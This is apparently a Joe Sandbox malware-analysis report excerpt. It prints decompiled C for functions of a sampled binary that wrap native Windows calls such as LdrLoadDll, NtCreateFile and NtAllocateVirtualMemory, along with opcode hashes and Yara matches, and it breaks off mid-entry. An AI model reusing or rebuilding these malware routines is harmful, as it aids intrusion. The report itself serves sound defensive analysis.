                                                                                                                        0x0041e867
                                                                                                                        0x0041e868
                                                                                                                        0x0041e86c
                                                                                                                        0x0041e7f1
                                                                                                                        0x0041e7f1
                                                                                                                        0x0041e7f6
                                                                                                                        0x0041e7f9
                                                                                                                        0x0041e7fc
                                                                                                                        0x0041e802
                                                                                                                        0x0041e80a
                                                                                                                        0x0041e82c
                                                                                                                        0x0041e830
                                                                                                                        0x0041e830

                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035A7,00000004,00001000,00000000), ref: 0041E82C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: d9d0d950605c32d8763116af6466b48799a51f71a33d017daa06292bb84d269b
                                                                                                                        • Instruction ID: e46fd505563f5dad76c9f07d01dba81da311becd3e8114d8b723d2f9316441db
                                                                                                                        • Opcode Fuzzy Hash: d9d0d950605c32d8763116af6466b48799a51f71a33d017daa06292bb84d269b
                                                                                                                        • Instruction Fuzzy Hash: 9F0112B6200219ABCB08DF89DC85EAB77ADEF88354F108119FE0997241C630E821CBB4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040CF43 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 130 40cf43-40cf6c call 420f43 133 40cf72-40cf80 call 421463 130->133 134 40cf6e-40cf71 130->134 137 40cf90-40cfa1 call 41f7f3 133->137 138 40cf82-40cf8d call 4216e3 133->138 143 40cfa3-40cfb7 LdrLoadDll 137->143 144 40cfba-40cfbd 137->144 138->137 143->144
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040CF43(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E00420F43( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421463(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E004216E3(__ebx,  &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E0041F7F3(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                        0x0040cf5f
                                                                                                                        0x0040cf62
                                                                                                                        0x0040cf67
                                                                                                                        0x0040cf6c
                                                                                                                        0x0040cf76
                                                                                                                        0x0040cf7b
                                                                                                                        0x0040cf7e
                                                                                                                        0x0040cf80
                                                                                                                        0x0040cf88
                                                                                                                        0x0040cf8d
                                                                                                                        0x0040cf8d
                                                                                                                        0x0040cf94
                                                                                                                        0x0040cf9c
                                                                                                                        0x0040cf9f
                                                                                                                        0x0040cfa1
                                                                                                                        0x0040cfb5
                                                                                                                        0x00000000
                                                                                                                        0x0040cfb7
                                                                                                                        0x0040cfbd
                                                                                                                        0x0040cf71
                                                                                                                        0x0040cf71
                                                                                                                        0x0040cf71

                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CFB5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: 9c4b13615efcff30583dbe2e1be3fa0f8b01dc4762725aa5eb4b9192ba65b7e7
                                                                                                                        • Instruction ID: b31de9d6898b209f76e1916665fb7cc4340a56636a24c9f3944aa9141f4b4037
                                                                                                                        • Opcode Fuzzy Hash: 9c4b13615efcff30583dbe2e1be3fa0f8b01dc4762725aa5eb4b9192ba65b7e7
                                                                                                                        • Instruction Fuzzy Hash: 250152B1E4010EABDF10DBE1DC82F9EB3789B14308F0042A6E918A7280F634EB048B95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041E613 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 153 41e613-41e664 call 41f283 NtCreateFile
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0041E613(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F283( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                                                        0x0041e622
                                                                                                                        0x0041e62a
                                                                                                                        0x0041e660
                                                                                                                        0x0041e664

                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(00000060,00000000,?,0041937F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041937F,?,00000000,00000060,00000000,00000000), ref: 0041E660
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                        • Instruction ID: 19dbbadb10e60bbbab071aff0a21b25a44a2393f781ed8497dead483f2fdcfbe
                                                                                                                        • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                        • Instruction Fuzzy Hash: CCF0BDB2204208ABCB48CF89DC85EEB37EDAF8C754F018248BA0997241C630E8518BA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041E6C3 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 156 41e6c3-41e70c call 41f283 NtReadFile
                                                                                                                        C-Code - Quality: 37%
                                                                                                                        			E0041E6C3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F283( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                                                                        0x0041e6d2
                                                                                                                        0x0041e6d2
                                                                                                                        0x0041e6da
                                                                                                                        0x0041e708
                                                                                                                        0x0041e70c

                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(00419543,00414A17,FFFFFFFF,0041902D,00000002,?,00419543,00000002,0041902D,FFFFFFFF,00414A17,00419543,00000002,00000000), ref: 0041E708
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                        • Instruction ID: 4d65283ae0a5e58cb1a7af73126d43b62e9c8ac6d01d34f0175aeb2c3bd5d1dc
                                                                                                                        • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                        • Instruction Fuzzy Hash: B7F0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BA0DA7241C630E8118BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041E7F3 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 159 41e7f3-41e809 160 41e80f-41e830 NtAllocateVirtualMemory 159->160 161 41e80a call 41f283 159->161 161->160
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0041E7F3(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t10 = _a4;
				_t2 = _t10 + 0x14; // 0x6ad05503
				_t3 = _t10 + 0xa8c; // 0x404033
				E0041F283( *_t2, _a4, _t3,  *_t2, 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                                                                        0x0041e7f6
                                                                                                                        0x0041e7f9
                                                                                                                        0x0041e802
                                                                                                                        0x0041e80a
                                                                                                                        0x0041e82c
                                                                                                                        0x0041e830

                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035A7,00000004,00001000,00000000), ref: 0041E82C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                        • Instruction ID: faf3bb23be813338cbb0e700e8739a3dab4a996eca752ba83aae82f17a894515
                                                                                                                        • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                        • Instruction Fuzzy Hash: 99F01EB6200208ABCB18DF89DC81EEB77ADAF8C754F018159BE0897241C630F811CBF4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041E73D Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 179 41e73d-41e759 180 41e75f-41e76c NtClose 179->180 181 41e75a call 41f283 179->181 181->180
                                                                                                                        C-Code - Quality: 58%
                                                                                                                        			E0041E73D(void* __eax, void* __edi, intOrPtr _a4, void* _a8) {
				long _t10;

				asm("stc");
				asm("movsb");
				_t7 = _a4;
				E0041F283( *((intOrPtr*)(_a4 + 0x14)), _t7, _t7 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t10 = NtClose(_a8); // executed
				return _t10;
			}




                                                                                                                        0x0041e73d
                                                                                                                        0x0041e73e
                                                                                                                        0x0041e746
                                                                                                                        0x0041e75a
                                                                                                                        0x0041e768
                                                                                                                        0x0041e76c

                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E768
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: 86ab19f9be83fc74fac12769fc1a5447b81f576b74b408c35db66009e2ce85f0
                                                                                                                        • Instruction ID: 45346b60e394a3b34e576d301a83efe1b69a230b60044c2bc2906465887b13b2
                                                                                                                        • Opcode Fuzzy Hash: 86ab19f9be83fc74fac12769fc1a5447b81f576b74b408c35db66009e2ce85f0
                                                                                                                        • Instruction Fuzzy Hash: 9FE0C2366402006FDB10EFA8DC85FC77F68DF4D220F0084A9B94C9B252C131E60287E0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041E743 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0041E743(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F283( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                                                        0x0041e75a
                                                                                                                        0x0041e768
                                                                                                                        0x0041e76c

                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E768
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                        • Instruction ID: 278650997c1464228c9c312c108a41a9fcc958d21306b503204848f722e6819c
                                                                                                                        • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                        • Instruction Fuzzy Hash: BFD0C732600204ABD610EBA8CC89FC73BACDF48620F0080A9BA0C5B242C130FA0086E0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: ce0a9973ce5ca9db6d47da7de8d56a37bd3e22ab544670247caef68bc654404c
                                                                                                                        • Instruction ID: ad57f798764407abaf6d4f77a55437b2c0858c67d16e0cb5c8e931ed7b3e7aae
                                                                                                                        • Opcode Fuzzy Hash: ce0a9973ce5ca9db6d47da7de8d56a37bd3e22ab544670247caef68bc654404c
                                                                                                                        • Instruction Fuzzy Hash: 899002B121100802D14071A944087560045A7D0381F91D011A9054554EC6998DE577A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: d4a8dfa1aa04890a061187e49978ed339f6c7b9862f844077b5a19e27a74e2ba
                                                                                                                        • Instruction ID: f6cd96847038c56241013ecbd0a85618b85e4e82ad904b5b6a72b80c8b340fa7
                                                                                                                        • Opcode Fuzzy Hash: d4a8dfa1aa04890a061187e49978ed339f6c7b9862f844077b5a19e27a74e2ba
                                                                                                                        • Instruction Fuzzy Hash: F9900265221004030105A5A907085170086A7D53D1391D021F5005550CD66188716261
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: b76da13af288f7f6222151e4b7a09d2ab2e5db47ce5c193975529d38af8d2d7a
                                                                                                                        • Instruction ID: dc3b56a44ccaa18ddb2bb94f794dc2fd675e785e7acc61f35ab6c049da1bbbbb
                                                                                                                        • Opcode Fuzzy Hash: b76da13af288f7f6222151e4b7a09d2ab2e5db47ce5c193975529d38af8d2d7a
                                                                                                                        • Instruction Fuzzy Hash: 679002A135100842D10061A94418B160045E7E1381F91D015E5054554DC659CC627266
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 787f67c8cc2360b2eb6906053db72fa7f45bf24d2877d36654ebd7e135a4399e
                                                                                                                        • Instruction ID: d9f14e22bb1ba0de552f79c2a468d0ccfcd54639dbff7cde69e626d38777f04f
                                                                                                                        • Opcode Fuzzy Hash: 787f67c8cc2360b2eb6906053db72fa7f45bf24d2877d36654ebd7e135a4399e
                                                                                                                        • Instruction Fuzzy Hash: 389002A121200403410571A94418626404AA7E0281B91D021E5004590DC56588A17265
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 710660f1a3e609877be9873b107756fac36b8b400909e26537329d935fc784d2
                                                                                                                        • Instruction ID: c9fc723fcf6f62a2b91c482cc66b44b60e508f27ba041a559d0f991fd5573cb2
                                                                                                                        • Opcode Fuzzy Hash: 710660f1a3e609877be9873b107756fac36b8b400909e26537329d935fc784d2
                                                                                                                        • Instruction Fuzzy Hash: 7A90027121100813D11161A945087170049A7D02C1FD1D412A4414558DD6968962B261
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 5e035c536c374b4756805ea854e01858f145b8046416bcdbcb35209c7cfe156c
                                                                                                                        • Instruction ID: 4d2980efd07803714f82eb59a521ead7f628bd010a92dfe2befe9fb484e2b5ea
                                                                                                                        • Opcode Fuzzy Hash: 5e035c536c374b4756805ea854e01858f145b8046416bcdbcb35209c7cfe156c
                                                                                                                        • Instruction Fuzzy Hash: 34900261252045525545B1A944085174046B7E02C17D1D012A5404950CC5669866E761
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 2ce8941fe89279c030cbdcd76178744a40226b6b995fc43015c88cb4c93714d4
                                                                                                                        • Instruction ID: c3bdcad154909d4a0f8c84008af73d3ab26831e3a789b76dd17492fa2342f2e8
                                                                                                                        • Opcode Fuzzy Hash: 2ce8941fe89279c030cbdcd76178744a40226b6b995fc43015c88cb4c93714d4
                                                                                                                        • Instruction Fuzzy Hash: 4D90026161100902D10171A94408626004AA7D02C1FD1D022A5014555ECA6589A2B271
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 29963ff763932c66dabd244b4516a64d7fe7781b99a6ec74fe5a8a465b8f58a9
                                                                                                                        • Instruction ID: 5b74170023e2beeb7907a5085ffe9844e8a14e1e078659c6ad6a77d13caa368c
                                                                                                                        • Opcode Fuzzy Hash: 29963ff763932c66dabd244b4516a64d7fe7781b99a6ec74fe5a8a465b8f58a9
                                                                                                                        • Instruction Fuzzy Hash: 8790027121100802D10065E9540C6560045A7E0381F91E011A9014555EC6A588A17271
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 435ad11238d06164938d7bd30bc9aca064be7e4e97839fb82f67a88d8b25c67c
                                                                                                                        • Instruction ID: 3ee7b1bf7b47d5227ca26c676bd9465d90b7e98b26bfbaef3b1f66f34e20510c
                                                                                                                        • Opcode Fuzzy Hash: 435ad11238d06164938d7bd30bc9aca064be7e4e97839fb82f67a88d8b25c67c
                                                                                                                        • Instruction Fuzzy Hash: F490026131100403D14071A9541C6164045F7E1381F91E011E4404554CD95588666362
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: ff151facd983667a7b2d1f6752a95c9b1d05001fad0a750c782754a37a1a8173
                                                                                                                        • Instruction ID: a14f6427fef1096802ae66b3677d4cb7c5d6086419c718cc91df3763c803aaa4
                                                                                                                        • Opcode Fuzzy Hash: ff151facd983667a7b2d1f6752a95c9b1d05001fad0a750c782754a37a1a8173
                                                                                                                        • Instruction Fuzzy Hash: F590026922300402D18071A9540C61A0045A7D1282FD1E415A4005558CC95588796361
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 569146702fcec99ded9d9ae9aac1e77fe3d8097f4610583823c2baec4823a952
                                                                                                                        • Instruction ID: c1bd394fab9f689678b60ebf258aee4c3bb02204db440fb7b91b3262ba3bc080
                                                                                                                        • Opcode Fuzzy Hash: 569146702fcec99ded9d9ae9aac1e77fe3d8097f4610583823c2baec4823a952
                                                                                                                        • Instruction Fuzzy Hash: 6290027132114802D11061A984087160045A7D1281F91D411A4814558DC6D588A17262
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: a5da9791dac344b3dda9bbe517fced820593f5d311eea1e4a0dd837438a2b730
                                                                                                                        • Instruction ID: 5f302f48d12c5e194c22ea19191a2f467b795988238902a58d8e5cc7ceb8ac98
                                                                                                                        • Opcode Fuzzy Hash: a5da9791dac344b3dda9bbe517fced820593f5d311eea1e4a0dd837438a2b730
